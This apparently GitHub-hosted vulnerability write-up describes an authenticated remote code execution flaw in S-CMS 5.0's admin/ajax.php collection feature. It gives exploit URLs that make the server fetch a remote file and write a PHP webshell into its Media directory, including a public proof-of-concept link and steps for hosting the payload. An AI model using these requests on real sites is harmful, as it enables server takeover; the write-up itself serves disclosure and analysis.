Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

1.First download the latest version of S-CMS Enterprise Construction System Version 5.0

image

2.Because the vulnerability is the background command execution requires logging in to the background administrator account. The loophole interface address is: http://10.10.10.8/admin/ajax.php?Type=collection&ACTION=All&pageurl=http://10.10.8:88/1.tXt&ID=1 Directly request test

image

3.After the request is successful, a randomly named PHP file will be generated in the Media directory. This file is our sentence Trojan. Let's visit and execute the command

image

image

4.Let ’s analyze the cause of the vulnerability. The vulnerability position is under admin/ajax.php file, and re -request the vulnerability URL:http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=http://10.10.10.8:88/1.txt&id=1 使用PhpStorm 开启调试并在以下位置设置断点

image

5.First check the fields in the SL_COMENT table. If the data exists, continue to execute downward

image

6.Extract all the data in the SL_COMENT table, and then bring the lrl (http://10.10.8:88/1.txt) the URL (http://10.10.8:88/1.txt) we give

image

7.The result of extraction returned and assigned value, we see that the return value is analyzed by the http://10.10.10.8:88/2.php link in the return value

image

8.Then download and read the content of the 2.php file, follow the downpic function

image

9.The PHP suffix of 2.php will be used as a preserved file suffix. The file name is used with the current time with random 3 -digit number to combine new file names. The 2.php file content is written into the Media directory through the file_put_contents method

image

image

10.Through the above operations, the Trojan horse will be written into the system. We can execute the system arbitrarily by accessing the PHP file.

image

11.The following two points need to be used to use this vulnerability:

11.1.Create a text file that is a similar data format in the SL_Collection table. Because the system will request the data in the table and extract the URL link in SRC, which is 2.PHP

image

11.2. 2.php In a phrase Trojan, note that the file cannot be run in the PHP environment, because the request needs a return value, all I use Python to start a HTTP service

![image](https://user-images.githubusercontent.com/113097106/227728467-f34ce272-5cce-46eb-82cd-fca1ea25d9ec.png

12.Online POC uses links : http://10.10.10.8/admin/ajax.php?type=collection&action=all&pageurl=https://raw.githubusercontent.com/superjock1988/debug/main/1.txt&id=1 Just need to modify the local server IP addre

image image image